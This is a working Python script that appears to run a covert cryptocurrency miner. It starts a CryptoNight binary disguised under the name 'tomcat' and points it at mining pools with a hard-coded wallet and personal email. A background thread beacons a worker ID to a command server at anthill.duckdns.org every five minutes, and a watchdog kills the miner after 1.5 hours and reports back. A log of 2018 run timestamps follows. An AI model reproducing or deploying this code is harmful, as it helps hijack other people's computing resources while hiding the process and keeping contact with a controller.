import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:29:06.146230
#2018-02-17 17:17:06.122514
#2018-02-17 19:05:06.008629
#2018-02-17 20:52:02.019237
#2018-02-17 22:38:07.507945
#2018-02-18 00:22:01.832099
#2018-02-18 02:13:01.852642
#2018-02-18 04:00:09.201229
#2018-02-18 05:51:06.410806
#2018-02-18 07:42:07.852441
#2018-02-18 09:29:06.823896
#2018-02-18 11:16:04.759237
#2018-02-18 13:02:05.940318
#2018-02-18 14:51:01.722494
#2018-02-18 16:38:05.859241
#2018-02-18 18:27:03.921216
#2018-02-18 20:14:06.092471
#2018-02-18 22:00:01.575821
#2018-02-18 23:49:01.800503
#2018-02-19 01:36:01.612120
#2018-02-19 03:24:07.955243
#2018-02-19 05:09:01.602451
#2018-02-19 06:57:03.389586
#2018-02-19 08:47:04.604218
#2018-02-19 10:36:05.478073
#2018-02-19 12:23:01.900006
#2018-02-19 14:10:02.878813
#2018-02-19 15:58:07.896332
#2018-02-19 17:48:10.904637
#2018-02-19 19:34:02.324013
#2018-02-19 21:23:07.372161
#2018-02-19 23:10:07.784760
#2018-02-20 00:57:03.734710
#2018-02-20 02:49:04.634507
#2018-02-20 04:37:07.047746
#2018-02-20 06:21:03.907533
#2018-02-20 08:06:06.010216
#2018-02-20 09:52:02.122154
#2018-02-20 11:36:04.219753
#2018-02-20 13:23:05.921362
#2018-02-20 15:07:07.237413
#2018-02-20 16:53:01.278863
#2018-02-20 18:43:06.330061
#2018-02-20 20:34:07.453659
#2018-02-20 22:20:01.634250
#2018-02-21 00:01:07.730489
#2018-02-21 01:48:01.382437
#2018-02-21 03:38:07.156651
#2018-02-21 05:27:07.488939
#2018-02-21 07:14:05.949159
#2018-02-21 09:00:09.662788
#2018-02-21 10:48:01.755220
#2018-02-21 12:34:07.563180
#2018-02-21 14:21:05.261330
#2018-02-21 16:09:05.053605
#2018-02-21 17:59:03.712143
#2018-02-21 19:47:01.888312
#2018-02-21 21:33:01.418138
#2018-02-21 23:18:03.827459
#2018-02-22 01:07:06.585918
#2018-02-22 02:55:01.425686
#2018-02-22 04:42:07.499319
#2018-02-22 06:26:06.777788
#2018-02-22 08:12:06.518770
#2018-02-22 09:59:06.154074
#2018-02-22 11:44:07.787966
#2018-02-22 13:30:11.456573
#2018-02-22 15:20:09.943507
#2018-02-22 17:05:10.708836
#2018-02-22 18:53:01.719422
#2018-02-22 20:44:01.630543
#2018-02-22 22:30:08.368437
#2018-02-23 00:15:07.547315
#2018-02-23 02:04:07.926456
#2018-02-23 03:52:06.267115
#2018-02-23 05:31:01.503957
#2018-02-23 07:14:05.908173
#2018-02-23 09:19:01.719289
#2018-02-23 11:24:07.807356
#2018-02-23 13:14:08.713600
#2018-02-23 14:59:04.873009
#2018-02-23 16:48:01.788676
#2018-02-23 18:33:01.514815
#2018-02-23 20:19:07.075587
#2018-02-23 22:07:05.113909
#2018-02-23 23:55:01.688338
#2018-02-24 01:45:03.912847
#2018-02-24 03:39:06.313474
#2018-02-24 05:24:06.427215
#2018-02-24 07:12:01.316138
#2018-02-24 09:04:06.474953
#2018-02-24 11:03:06.603065
#2018-02-24 12:51:05.864771
#2018-02-24 14:39:05.370229
#2018-02-24 16:28:04.460806
#2018-02-24 18:20:06.831428
#2018-02-24 20:06:06.667197
#2018-02-24 21:48:06.586953
#2018-02-25 01:53:06.606129
#2018-02-25 05:03:03.777030
#2018-02-25 09:56:01.823551